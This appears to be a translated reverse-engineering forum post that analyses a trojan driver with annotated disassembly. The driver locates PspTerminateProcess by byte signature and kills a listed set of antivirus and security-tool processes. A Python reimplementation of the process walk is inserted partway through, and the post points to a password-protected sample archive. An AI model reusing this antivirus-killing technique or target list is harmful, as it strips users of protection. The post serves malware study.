Yesterday's post got judged a YJ post.., hopefully this one won't...
The trojan is fairly simple, good for newcomers.
First the behaviour: the exe drops three files, Pcix32.sys, amd32_.sys and atax32.sys, but the latter two are actually just copies of the first. The sys file monitors the startup of all sorts of antivirus software and security tools and kills them as soon as it spots one.
1. exe behaviour
I'll only give the outline here; for details see the idb file and trace it yourself, heh.
It first gets the system drivers directory, then drops Pcix32.sys there, making various copies along the way.
Also, the exe checks whether Huanyuan Jingling (还原精灵, a system-restore tool) is present and handles it accordingly if so, but I'm too lazy.. too lazy to set up the environment; anyone interested can trace that part :)
If there's no Huanyuan Jingling, it loads the driver.
Finally there's an injection step, which I didn't trace closely either :D
2. sys
This is the interesting part; here's the code:

Code:
.text:00010B34                 lea     eax, [ebp+SystemInformation]
.text:00010B37                 push    eax             ; ReturnLength
.text:00010B38                 push    0               ; SystemInformationLength
.text:00010B3A                 push    eax             ; SystemInformation
.text:00010B3B                 push    0Bh             ; SystemInformationClass
.text:00010B3D                 mov     edi, ds:__imp_ZwQuerySystemInformation
.text:00010B43                 call    edi ; __imp_ZwQuerySystemInformation
.text:00010B45                 push    [ebp+SystemInformation] ; NumberOfBytes
.text:00010B48                 push    1               ; PoolType
.text:00010B4A                 call    ds:ExAllocatePool
Gets various system information... (class 0Bh is the loaded-module list: the first call with length 0 only returns the required size, then a pool buffer is allocated and the query is repeated into it)
Code:
.text:00010B5A                 push    0               ; ReturnLength
.text:00010B5C                 push    [ebp+SystemInformation] ; SystemInformationLength
.text:00010B5F                 push    esi             ; SystemInformation
.text:00010B60                 push    0Bh             ; SystemInformationClass
.text:00010B62                 call    edi ; __imp_ZwQuerySystemInformation
.text:00010B64                 test    eax, eax
.text:00010B66                 jl      short loc_10BDE
.text:00010B68                 mov     ebx, [esi+0Ch]
.text:00010B6B                 mov     edi, [esi+10h]
.text:00010B6E                 add     edi, ebx
.text:00010B70                 push    0               ; Tag
.text:00010B72                 push    esi             ; P
.text:00010B73                 call    ds:ExFreePoolWithTag
.text:00010B79                 mov     esi, ebx
.text:00010B7B
.text:00010B7B loc_10B7B:                              ; CODE XREF: sub_10B28+BFj
.text:00010B7B                 cmp     esi, edi
.text:00010B7D                 ja      short loc_10BDE
.text:00010B7F                 push    esi             ; VirtualAddress
.text:00010B80                 call    ds:MmIsAddressValid
.text:00010B86                 test    al, al
.text:00010B88                 jz      short loc_10BE6
.text:00010B8A                 lea     ebx, [esi+4]
.text:00010B8D                 push    ebx             ; VirtualAddress
.text:00010B8E                 call    ds:MmIsAddressValid ; check that the address is valid, to avoid a BSOD...
.text:00010B94                 test    al, al
.text:00010B96                 jz      short loc_10BE6
.text:00010B98                 mov     eax, 8B55FF8Bh ; google this value and you'll find it's PspTerminateProcess
.text:00010B9D                 cmp     [esi], eax
.text:00010B9F                 jnz     short loc_10BE6
.text:00010BA1                 mov     eax, 0CEC83ECh
.text:00010BA6                 cmp     [ebx], eax
.text:00010BA8                 jnz     short loc_10BE6
.text:00010BAA                 mov     eax, 0FFF84D83h
.text:00010BAF                 cmp     [esi+8], eax
.text:00010BB2                 jnz     short loc_10BE6
.text:00010BB4                 mov     eax, 7D8B5756h
.text:00010BB9                 cmp     [esi+0Ch], eax
.text:00010BBC                 jnz     short loc_10BE6
.text:00010BBE                 and     [ebp+ms_exc.disabled], 0
.text:00010BC2                 mov     [ebp+var_20], esi
.text:00010BC5                 mov     [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010BCC                 mov     eax, esi ; save the function address
The author was quite thorough... if this function isn't found:
Code:
.text:00010A40                 call    _GetPspTerminateProcessAddress
.text:00010A45                 mov     PspTerminateProcess, eax
.text:00010A4A                 test    eax, eax
.text:00010A4C                 jnz     short loc_10A8F
.text:00010A4E                 call    sub_10568
it goes and looks for the PsTerminateProcess thingy instead:
Code:
sub_10568       proc near               ; CODE XREF: sub_10A30+1Ep
.text:00010568                 push    offset aPsterminatesys ; "PsTerminateSystemThread"
.text:0001056D                 push    sysInfo
.text:00010573                 call    sub_10486
.text:00010578                 xor     ecx, ecx
.text:0001057A
.text:0001057A loc_1057A:                              ; CODE XREF: sub_10568+28j
.text:0001057A                 cmp     byte ptr [eax], 0FFh ; 0xFF7508, i.e. psterminateprocess
.text:0001057D                 jnz     short loc_1058B
.text:0001057F                 cmp     byte ptr [eax+1], 75h
.text:00010583                 jnz     short loc_1058B
.text:00010585                 cmp     byte ptr [eax+2], 8
.text:00010589                 jz      short loc_10595
....
.text:00010595 loc_10595:                              ; CODE XREF: sub_10568+21j
.text:00010595                 add     eax, 5
.text:00010598                 mov     ecx, [eax]
.text:0001059A                 lea     eax, [ecx+eax+4]
.text:0001059E                 retn
There are two more functions in between; short on time, I didn't look at them closely, so I'll skip them....
Next is the find-and-kill function, the culprit that does the dirty work:
Code:
.text:00010CEC                 mov     edi, edi
.text:00010CEE                 push    ebp
.text:00010CEF                 mov     ebp, esp
.text:00010CF1                 sub     esp, 6A4h
.text:00010CF7                 and     [ebp+var_C], 0
.text:00010CFB                 push    ebx
.text:00010CFC                 push    esi
.text:00010CFD                 push    edi
.text:00010CFE                 mov     esi, 0FFFFh
.text:00010D03                 push    esi             ; NumberOfBytes
.text:00010D04                 mov     ebx, offset aKvmonxp_exe ; "KVMonXp.exe"
.text:00010D09                 push    1               ; PoolType
.text:00010D0B                 mov     [ebp+SourceString], offset aNod32krn_exe ; "nod32krn.exe"
.text:00010D15                 mov     [ebp+var_C0], offset aEgui_exe ; "egui.exe"
.text:00010D1F                 mov     [ebp+var_BC], offset aEkrn_exe ; "ekrn.exe"
.text:00010D29                 mov     [ebp+var_B8], offset a360tray_exe ; "360tray.exe"
.text:00010D33                 mov     [ebp+var_B4], offset a360safe_exe ; "360Safe.exe"
.text:00010D3D                 mov     [ebp+var_B0], offset aSafeboxtray_ex ; "safeboxTray.exe"
.text:00010D47                 mov     [ebp+var_AC], offset a360safebox_exe ; "360safebox.exe"
.text:00010D51                 mov     [ebp+var_A8], offset a360sd_exe ; "360sd.exe"
.text:00010D5B                 mov     [ebp+var_A4], offset aZhudongfangyu_ ; "ZhuDongFangYu.exe"
.text:00010D65                 mov     [ebp+var_A0], offset a360rp_exe ; "360rp.exe"
.text:00010D6F                 mov     [ebp+var_9C], offset a360sdupd_exe ; "360sdupd.exe"
.text:00010D79                 mov     [ebp+var_98], offset a360rps_exe ; "360rps.exe"
.text:00010D83                 mov     [ebp+var_94], offset a3_0 ; "3"
.text:00010D8D                 mov     [ebp+var_90], offset aO ; "O"
.text:00010D97                 mov     [ebp+var_8C], offset asc_11BDE ; "L"
.text:00010DA1                 mov     [ebp+var_88], offset aK_8 ; "K"
.text:00010DAB                 mov     [ebp+var_84], offset aK_7 ; "k"
.text:00010DB5                 mov     [ebp+var_80], offset aK_6 ; "k"
.text:00010DBC                 mov     [ebp+var_7C], offset aK_5 ; "k"
.text:00010DC3                 mov     [ebp+var_78], offset aK_4 ; "k"
.text:00010DCA                 mov     [ebp+var_74], offset aU ; "u"
.text:00010DD1                 mov     [ebp+var_70], offset aKxescore_exe ; "kxescore.exe"
.text:00010DD8                 mov     [ebp+var_6C], offset aKxetray_exe ; "kxetray.exe"
.text:00010DDF                 mov     [ebp+var_68], offset aK_3 ; "K"
.text:00010DE6                 mov     [ebp+var_64], offset aK ; "K"
.text:00010DED                 mov     [ebp+var_60], offset aGuiyingfix_exe ; "guiyingfix.exe"
.text:00010DF4                 mov     [ebp+var_5C], offset aRavmond_exe ; "RavMonD.exe"
.text:00010DFB                 mov     [ebp+var_58], offset aR_3 ; "R"
.text:00010E02                 mov     [ebp+var_54], offset aR ; "R"
.text:00010E09                 mov     [ebp+var_50], offset aRegguide_exe ; "RegGuide.exe"
.text:00010E10                 mov     [ebp+var_4C], offset aR_0 ; "R"
.text:00010E17                 mov     [ebp+var_48], offset aRscopy_exe ; "RsCopy.exe"
.text:00010E1E                 mov     [ebp+var_44], offset aRav_exe ; "Rav.exe"
.text:00010E25                 mov     [ebp+var_40], offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010E2C                 mov     [ebp+var_3C], offset word_119F2
.text:00010E33                 mov     [ebp+var_38], ebx
.text:00010E36                 mov     [ebp+var_34], offset aA ; "a"
.text:00010E3D                 mov     [ebp+var_30], offset aIcesword_exe ; "IceSword.exe"
.text:00010E44                 mov     [ebp+var_2C], offset aS_0 ; "S"
.text:00010E4B                 mov     [ebp+var_28], offset aR_1 ; "r"
.text:00010E52                 mov     [ebp+var_24], offset aKnownsvr_exe ; "knownsvr.exe"
.text:00010E59                 mov     [ebp+var_20], offset aR_2 ; "r"
.text:00010E60                 mov     [ebp+var_1C], offset aKnsdtray_exe ; "knsdtray.exe"
.text:00010E67                 mov     [ebp+var_18], offset aK_2 ; "k"
.text:00010E6E                 mov     [ebp+var_14], offset aK_1 ; "k"
.text:00010E75                 mov     [ebp+var_10], offset aK_0 ; "k"
.text:00010E7C                 call    ds:ExAllocatePool
.text:00010E82                 mov     edi, eax
.text:00010E84                 mov     [ebp+P], edi
.text:00010E87                 test    edi, edi
.text:00010E89                 jz      loc_10FA5
.text:00010E8F                 push    offset Format   ; "enter findprocessandkill\n"
.text:00010E94                 call    DbgPrint
.text:00010E99                 pop     ecx
.text:00010E9A                 lea     eax, [ebp+ReturnLength]
.text:00010E9D                 push    eax             ; ReturnLength
.text:00010E9E                 push    esi             ; SystemInformationLength
.text:00010E9F                 push    edi             ; SystemInformation
.text:00010EA0                 push    5               ; SystemInformationClass
.text:00010EA2                 call    ds:__imp_ZwQuerySystemInformation
.text:00010EA8                 mov     esi, edi
.text:00010EAA
.text:00010EAA loc_10EAA:                              ; CODE XREF: _FindAddKillProcess+2A8j
.text:00010EAA                 add     esi, [esi]
.text:00010EAC                 xor     eax, eax
.text:00010EAE                 lea     edi, [esi+38h]
.text:00010EB1                 cmp     [edi], ax
.text:00010EB4                 jz      loc_10F91
.text:00010EBA                 mov     [ebp+ReturnLength], eax
.text:00010EBD
.text:00010EBD loc_10EBD:                              ; CODE XREF: _FindAddKillProcess+29Fj
.text:00010EBD                 push    [ebp+eax*4+SourceString] ; SourceString
.text:00010EC4                 lea     eax, [ebp+eax*8+DestinationString]
.text:00010ECB                 push    eax             ; DestinationString
.text:00010ECC                 call    ds:RtlInitUnicodeString
.text:00010ED2                 mov     eax, [ebp+ReturnLength]
.text:00010ED5                 push    1               ; CaseInSensitive
.text:00010ED7                 lea     eax, [ebp+eax*8+DestinationString]
.text:00010EDE                 push    eax             ; String2
.text:00010EDF                 push    edi             ; String1
.text:00010EE0                 call    ds:RtlCompareUnicodeString
.text:00010EE6                 test    eax, eax
.text:00010EE8                 jnz     loc_10F7C
.text:00010EEE                 mov     eax, [ebp+ReturnLength]
.text:00010EF1                 push    offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010EF6                 push    [ebp+eax*4+SourceString] ; wchar_t *
.text:00010EFD                 call    ds:_wcsicmp
.text:00010F03                 pop     ecx
.text:00010F04                 pop     ecx
.text:00010F05                 test    eax, eax
.text:00010F07                 jz      short loc_10F75
.text:00010F09                 mov     eax, [ebp+ReturnLength]
.text:00010F0C                 push    offset word_119F2 ; wchar_t *
.text:00010F11                 push    [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F18                 call    ds:_wcsicmp
.text:00010F1E                 pop     ecx
.text:00010F1F                 pop     ecx
.text:00010F20                 test    eax, eax
.text:00010F22                 jz      short loc_10F75
.text:00010F24                 mov     eax, [ebp+ReturnLength]
.text:00010F27                 push    ebx             ; wchar_t *
.text:00010F28                 push    [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F2F                 call    ds:_wcsicmp
.text:00010F35                 pop     ecx
.text:00010F36                 pop     ecx
.text:00010F37                 test    eax, eax
.text:00010F39                 jz      short loc_10F75
.text:00010F3B                 mov     eax, [ebp+ReturnLength]
.text:00010F3E                 push    [ebp+eax*4+SourceString]
.text:00010F45                 push    offset aFindProcesssWs ; "Find Processs: %ws\n"
.text:00010F4A                 call    DbgPrint
.text:00010F4F                 pop     ecx
.text:00010F50                 pop     ecx
.text:00010F51                 push    dword ptr [esi+44h] ; PEPROCESS
.text:00010F54                 call    KillProcess
.text:00010F59                 test    eax, eax
.text:00010F5B                 jl      short loc_10F7C
.text:00010F5D                 mov     eax, [ebp+ReturnLength]
.text:00010F60                 push    [ebp+eax*4+SourceString]
.text:00010F67                 push    offset aKillProcesssWs ; "Kill Processs: %ws OK!\n"
.text:00010F6C                 call    DbgPrint
.text:00010F71                 pop     ecx
.text:00010F72                 pop     ecx
.text:00010F73                 jmp     short loc_10F7C
.text:00010F75 ; ---------------------------------------------------------------------------
.text:00010F75
.text:00010F75 loc_10F75:                              ; CODE XREF: _FindAddKillProcess+21Bj
.text:00010F75                                         ; _FindAddKillProcess+236j ...
.text:00010F75                 mov     byte_1212C, 1
.text:00010F7C
.text:00010F7C loc_10F7C:                              ; CODE XREF: _FindAddKillProcess+1FCj
.text:00010F7C                                         ; _FindAddKillProcess+26Fj ...
.text:00010F7C                 mov     eax, [ebp+ReturnLength]
.text:00010F7F                 inc     eax
.text:00010F80                 cmp     [ebp+eax*4+SourceString], 0
.text:00010F88                 mov     [ebp+ReturnLength], eax
.text:00010F8B                 jnz     loc_10EBD
.text:00010F91
.text:00010F91 loc_10F91:                              ; CODE XREF: _FindAddKillProcess+1C8j
.text:00010F91                 cmp     dword ptr [esi], 0
.text:00010F94                 jnz     loc_10EAA
.text:00010F9A                 push    0               ; Tag
.text:00010F9C                 push    [ebp+P]         ; P
.text:00010F9F                 call    ds:ExFreePoolWithTag
.text:00010FA5
.text:00010FA5 loc_10FA5:                              ; CODE XREF: _FindAddKillProcess+19Dj
.text:00010FA5                 pop     edi
.text:00010FA6                 pop     esi
.text:00010FA7                 pop     ebx
.text:00010FA8                 leave
.text:00010FA9                 retn
It loops over a pile of security tools and kills any it finds~
Heh, let's see how it kills them:
Code:
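The loop at loc_10EAA walks the class-5 (SystemProcessInformation) buffer by NextEntryOffset and compares each ImageName against the table above; matches on KVSrvXP.exe, KVMonXp.exe and word_119F2 only set byte_1212C, everything else goes to KillProcess. The following is an added example, not code from the post or from the sample: it reproduces that walk and the verdict in Python over a constructed buffer so the offsets the driver relies on are visible. The 0xB8 entry size, the base address and the process list are assumptions.

```python
import struct

# Offsets the driver dereferences in each SYSTEM_PROCESS_INFORMATION entry
# (32-bit XP layout): NextEntryOffset at +0 ("add esi, [esi]"), ImageName
# UNICODE_STRING at +0x38 ("lea edi, [esi+38h]"), UniqueProcessId at +0x44
# ("push dword ptr [esi+44h]" before KillProcess).
OFF_NEXT, OFF_IMAGE_NAME, OFF_PID = 0x00, 0x38, 0x44
ENTRY_SIZE = 0xB8  # sizeof(SYSTEM_PROCESS_INFORMATION) on x86 XP; assumed

# Names from the driver's table (the single-letter junk entries dropped).
TARGETS = {n.lower() for n in [
    "nod32krn.exe", "egui.exe", "ekrn.exe", "360tray.exe", "360Safe.exe",
    "safeboxTray.exe", "360safebox.exe", "360sd.exe", "ZhuDongFangYu.exe",
    "360rp.exe", "360sdupd.exe", "360rps.exe", "kxescore.exe", "kxetray.exe",
    "guiyingfix.exe", "RavMonD.exe", "RegGuide.exe", "RsCopy.exe", "Rav.exe",
    "KVSrvXP.exe", "KVMonXp.exe", "IceSword.exe", "knownsvr.exe", "knsdtray.exe"]}
# Matches that go to loc_10F75 and only set byte_1212C instead of killing
# (the third such name, word_119F2, is not readable in the listing).
FLAG_ONLY = {"kvsrvxp.exe", "kvmonxp.exe"}

def walk_process_info(buf, base):
    """Yield (pid, name) the way loc_10EAA does: step by NextEntryOffset
    first (so entry 0 is skipped), ignore entries with ImageName.Length 0,
    stop at NextEntryOffset 0. base = virtual address of buf, needed to
    turn UNICODE_STRING.Buffer pointers back into offsets."""
    off = 0
    while True:
        off += struct.unpack_from("<I", buf, off + OFF_NEXT)[0]
        length, _max, ptr = struct.unpack_from("<HHI", buf, off + OFF_IMAGE_NAME)
        pid = struct.unpack_from("<I", buf, off + OFF_PID)[0]
        if length:
            yield pid, buf[ptr - base:ptr - base + length].decode("utf-16-le")
        if struct.unpack_from("<I", buf, off + OFF_NEXT)[0] == 0:
            return

def classify(entries):
    """Driver's verdict per process: case-insensitive table match
    (RtlCompareUnicodeString, CaseInSensitive=1), then 'flag' or 'kill'."""
    return [(pid, name, "flag" if name.lower() in FLAG_ONLY else "kill")
            for pid, name in entries if name.lower() in TARGETS]

def build_snapshot(procs, base):
    """Constructed test data laid out like the real buffer: fixed part,
    then the UTF-16 name, Buffer pointing at it, entries 8-byte aligned."""
    buf = bytearray()
    for i, (pid, name) in enumerate(procs):
        raw = name.encode("utf-16-le")
        size = ENTRY_SIZE + len(raw)
        size += -size % 8
        entry = bytearray(size)
        struct.pack_into("<I", entry, OFF_NEXT, 0 if i == len(procs) - 1 else size)
        ptr = base + len(buf) + ENTRY_SIZE if raw else 0
        struct.pack_into("<HHI", entry, OFF_IMAGE_NAME, len(raw), len(raw) + 2, ptr)
        struct.pack_into("<I", entry, OFF_PID, pid)
        entry[ENTRY_SIZE:ENTRY_SIZE + len(raw)] = raw
        buf += entry
    return bytes(buf)
```

Running `classify(walk_process_info(snap, base))` on a snapshot built with `build_snapshot` shows which names the driver would have killed and which it only flags.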
KillProcess     proc near               ; CODE XREF: _FindAddKillProcess+268p
.text:00010CB0
.text:00010CB0 PEPROCESS       = dword ptr  8
.text:00010CB0
.text:00010CB0                 mov     edi, edi
.text:00010CB2                 push    ebp
.text:00010CB3                 mov     ebp, esp
.text:00010CB5                 lea     eax, [ebp+PEPROCESS]
.text:00010CB8                 push    eax
.text:00010CB9                 push    [ebp+PEPROCESS]
.text:00010CBC                 call    PsLookupProcessByProcessId
.text:00010CC1                 test    eax, eax
.text:00010CC3                 jl      short loc_10CCE
.text:00010CC5                 mov     ecx, [ebp+PEPROCESS] ; Object
.text:00010CC8                 call    ds:ObfDereferenceObject
.text:00010CCE
.text:00010CCE loc_10CCE:                              ; CODE XREF: KillProcess+13j
.text:00010CCE                 push    [ebp+PEPROCESS]
.text:00010CD1                 call    sub_10C4E
.text:00010CD6                 test    eax, eax
.text:00010CD8                 jl      short loc_10CDE
.text:00010CDA                 xor     eax, eax
.text:00010CDC                 jmp     short loc_10CE3
.text:00010CDE ; ---------------------------------------------------------------------------
.text:00010CDE
.text:00010CDE loc_10CDE:                              ; CODE XREF: KillProcess+28j
.text:00010CDE                 mov     eax, 0C0000001h
.text:00010CE3
.text:00010CE3 loc_10CE3:                              ; CODE XREF: KillProcess+2Cj
.text:00010CE3                 pop     ebp
.text:00010CE4                 retn    4
.text:00010CE4 KillProcess     endp
Then the call at 00010CD1:
Code:
.text:00010C50                 push    offset unk_12088
.text:00010C55                 call    __SEH_prolog4
.text:00010C5A                 xor     edi, edi
.text:00010C5C                 mov     [ebp+var_1C], edi
.text:00010C5F                 mov     [ebp+ms_exc.disabled], edi
.text:00010C62                 push    edi             ; Object
.text:00010C63
.text:00010C63 loc_10C63:                              ; CODE XREF: sub_10C4E+32j
.text:00010C63                 push    [ebp+PEPROCESS] ; PEPROCESS
.text:00010C66                 call    sub_10BEE
.text:00010C6B                 mov     esi, eax
.text:00010C6D                 cmp     esi, edi
.text:00010C6F                 jz      short loc_10C99
.text:00010C71                 mov     [ebp+var_1C], edi
.text:00010C74                 push    edi
.text:00010C75                 push    esi
.text:00010C76                 call    PspTerminateProcess
.text:00010C7C                 mov     [ebp+var_1C], eax
.text:00010C7F                 push    esi
.text:00010C80                 jmp     short loc_10C63
.text:00010C82 ; ---------------------------------------------------------------------------
.text:00010C82
.text:00010C82 loc_10C82:                              ; DATA XREF: .rdata:0001209Co
.text:00010C82                 mov     eax, [ebp+ms_exc.exc_ptr]
.text:00010C85                 mov     eax, [eax]
.text:00010C87                 mov     eax, [eax]
.text:00010C89                 mov     [ebp+var_20], eax
.text:00010C8C                 xor     eax, eax
.text:00010C8E                 inc     eax
.text:00010C8F                 retn
.text:00010C90 ; ---------------------------------------------------------------------------
.text:00010C90
.text:00010C90 loc_10C90:                              ; DATA XREF: .rdata:000120A0o
.text:00010C90                 mov     esp, [ebp+ms_exc.old_esp]
.text:00010C93                 mov     eax, [ebp+var_20]
.text:00010C96                 mov     [ebp+var_1C], eax
.text:00010C99
.text:00010C99 loc_10C99:                              ; CODE XREF: sub_10C4E+21j
.text:00010C99                 mov     [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010CA0                 mov     eax, [ebp+var_1C]
.text:00010CA3                 call    __SEH_epilog4
.text:00010CA8                 retn    4
.text:00010CA8 sub_10C4E       endp
That's it for now.. it's written a bit briefly, please bear with me...


Archive password: pediy
Virus.rar